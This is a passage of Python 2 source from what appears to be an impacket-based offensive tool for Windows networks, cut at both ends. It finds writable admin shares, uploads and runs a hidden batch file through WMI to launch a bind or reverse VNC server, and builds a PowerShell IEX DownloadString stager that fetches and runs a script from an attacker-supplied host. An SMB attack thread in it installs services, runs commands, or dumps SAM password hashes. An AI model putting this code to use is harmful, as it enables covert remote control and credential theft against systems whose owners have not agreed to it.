if i['shi1_type'] == srvs.STYPE_DISKTREE or i['shi1_type'] == srvs.STYPE_SPECIAL:
share = i['shi1_netname'][:-1]
if (len(share) == 2 and share[1] == '$') or share == 'ADMIN$':
pass
else:
logging.info('Bad share %s' % share)
continue
try:
self.smbConnection.createDirectory(share,'ARTKOND')
except:
# Can't create, pass
#import traceback
#print traceback.print_exc()
logging.critical("share '%s' is not writable." % share)
pass
else:
logging.info('Found writable share %s' % share)
self.smbConnection.deleteDirectory(share,'ARTKOND')
return str(share)
return None
def getShares(self):
# Setup up a DCE SMBTransport with the connection already in place
logging.info("Requesting shares on %s....." % (self.smbConnection.getRemoteHost()))
try:
self._rpctransport = transport.SMBTransport(self.smbConnection.getRemoteHost(), self.smbConnection.getRemoteHost(),filename = r'\srvsvc', smb_connection = self.smbConnection)
dce_srvs = self._rpctransport.get_dce_rpc()
dce_srvs.connect()
dce_srvs.bind(srvs.MSRPC_UUID_SRVS)
resp = srvs.hNetrShareEnum(dce_srvs, 1)
return resp['InfoStruct']['ShareInfo']['Level1']
except:
logging.critical("Error requesting shares on %s, aborting....." % (self.smbConnection.getRemoteHost()))
raise
def get_vnc_upload_path(self, share):
if share == 'ADMIN$':
return "C:\\windows\\temp\\"
if len(share) == 2:
if share[1] == '$':
return share[0] + ":\\"
def copy_file(self, file, tree, dst):
logging.info("Uploading " + self.vnc_upload_path + self.vnc_upload_filename)
pathname = string.replace(dst,'/','\\')
try:
self.smbConnection.putFile(tree, pathname, file.read)
except:
logging.critical("Error uploading file %s, aborting....." % dst)
raise
def upload_vnc(self, addr, bc_ip, contype, vncpass, vncport, invoke_vnc_path):
fileCopied = False
serviceCreated = False
# Do the stuff here
try:
# Let's get the shares
if self.__share is None:
shares = self.getShares()
self.__share = self.findWritableShare(shares)
if self.__share is None:
logging.critical("Couldn't find writable share")
raise
self.vnc_upload_path = self.get_vnc_upload_path(self.__share)
if self.vnc_upload_path is None:
logging.critical("Can't deduct local path from share name " + self.__share)
raise
self.vnc_upload_filename = uuid.uuid4().hex[:8] + '.bat'
encoded_bat = BatEncode(open(invoke_vnc_path, 'rb').read(), self.vnc_upload_path + self.vnc_upload_filename, self.launch_string)
encoded_buffer = encoded_bat.get_buffer()
mem_file = StringIO.StringIO(encoded_buffer)
if self.__share == 'ADMIN$':
self.full_file_path = '\\TEMP\\' + self.vnc_upload_filename
else:
self.full_file_path = '\\' + self.vnc_upload_filename
self.copy_file(mem_file , self.__share, self.full_file_path)
fileCopied = True
except:
raise
def run(self, addr, method, bc_ip, contype, vncpass, vncport, invoke_vnc_path, httpport):
if bc_ip is None:
bc_ip = ''
self.launch_string = 'Invoke-Vnc '
if contype == 'bind':
pass
elif contype == 'reverse':
if bc_ip is None:
print 'Ip addr required for reverse connection'
sys.exit(1)
else:
self.launch_string += '-IpAddress ' + bc_ip
self.launch_string += ' -ConType ' + contype +' -Port ' + vncport + ' -Password ' + vncpass
logging.info("Using powershell launch string '" + self.launch_string + "'")
if method == 'upload':
logging.info("Connecting to SMB at " + addr)
self.smbConnection = SMBConnection(addr, addr)
if self.__doKerberos is False:
self.smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
self.smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey, kdcHost=self.__kdcHost)
dialect = self.smbConnection.getDialect()
if dialect == SMB_DIALECT:
logging.info("SMBv1 dialect used")
elif dialect == SMB2_DIALECT_002:
logging.info("SMBv2.0 dialect used")
elif dialect == SMB2_DIALECT_21:
logging.info("SMBv2.1 dialect used")
else:
logging.info("SMBv3.0 dialect used")
self.upload_vnc(addr, bc_ip, contype, vncpass, vncport, invoke_vnc_path)
dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, oxidResolver=True, doKerberos=self.__doKerberos, kdcHost=self.__kdcHost)
try:
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices= iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
iWbemLevel1Login.RemRelease()
win32Process,_ = iWbemServices.GetObject('Win32_Process')
self.shell = RemoteShell(self.__share, win32Process, None)
logging.info("Executing " + self.vnc_upload_path + self.vnc_upload_filename)
if contype == 'bind':
logging.info("VNC server should start at {0}:{1}".format(addr, vncport))
else:
logging.info("Expect reverse VNC connection at port " + vncport)
self.shell.onecmd(self.vnc_upload_path + self.vnc_upload_filename)
logging.info("Sleeping 10 seconds to allow bat file to unpack itself before deleting it")
time.sleep(10)
self.smbConnection.deleteFile(self.__share, self.full_file_path)
logging.info("File " + self.__share + self.full_file_path + " deleted")
except (Exception, KeyboardInterrupt), e:
#import traceback
#traceback.print_exc()
logging.error(str(e))
logging.info("Error on executing bat file. Trying to delete it before exiting")
self.smbConnection.deleteFile(self.__share, self.full_file_path)
logging.info("{0} deleted".format(self.__share + self.full_file_path))
if self.smbConnection is not None:
self.smbConnection.logoff()
dcom.disconnect()
sys.stdout.flush()
sys.exit(1)
if self.smbConnection is not None:
self.smbConnection.logoff()
dcom.disconnect()
elif method == 'download':
if bc_ip == '':
logging.critical("-bc-ip needed when using download delivery method")
sys.exit(1)
ps1_line = "IEX (New-Object System.Net.Webclient).DownloadString('http://{0}:{1}/Invoke-Vnc.ps1'); {2}".format(bc_ip, httpport, self.launch_string)
logging.info("Stager: {0}".format(ps1_line))
command = str(PSOneliner(ps1_line))
logging.debug(command)
dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, oxidResolver=True, doKerberos=self.__doKerberos, kdcHost=self.__kdcHost)
try:
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices= iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
iWbemLevel1Login.RemRelease()
win32Process,_ = iWbemServices.GetObject('Win32_Process')
self.shell = RemoteShell(None, win32Process, None)
self.shell.onecmd(command)
while True:
pass
dcom.disconnect()
except (Exception, KeyboardInterrupt), e:
#import traceback
#traceback.print_exc()
logging.error(str(e))
logging.critical("Closing DCOM connection")
dcom.disconnect()
sys.stdout.flush()
raise
class SMBAttack(Thread):
def __init__(self, config, SMBClient, username):
Thread.__init__(self)
self.daemon = True
if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3):
self.__SMBConnection = SMBConnection(existingConnection=SMBClient)
else:
self.__SMBConnection = SMBClient
self.config = config
self.__answerTMP = ""
if self.config.interactive:
# Launch locally listening interactive shell
self.tcpshell = TcpShell()
else:
self.tcpshell = None
if self.config.exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, self.config.exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
if self.tcpshell is not None:
logging.info("Started interactive SMB client shell via TCP on 127.0.0.1:%d" % self.tcpshell.port)
# Start listening and launch interactive shell
self.tcpshell.listen()
self.shell = MiniImpacketShell(self.__SMBConnection, self.tcpshell.socketfile)
self.shell.cmdloop()
return
if self.config.exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception, e:
# Something wen't wrong, most probably we don't have access as admin. aborting
logging.error(str(e))
return
try:
if self.config.command is not None:
remoteOps._RemoteOperations__executeRemote(self.config.command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = ""
self.__SMBConnection.getFile("ADMIN$", "Temp\\__output", self.__answer)
self.__SMBConnection.deleteFile("ADMIN$", "Temp\\__output")
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote=True)
samHashes.dump()
samHashes.export(self.__SMBConnection.getRemoteHost() + "_samhashes")
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception, e:
logging.error(str(e))
finally:
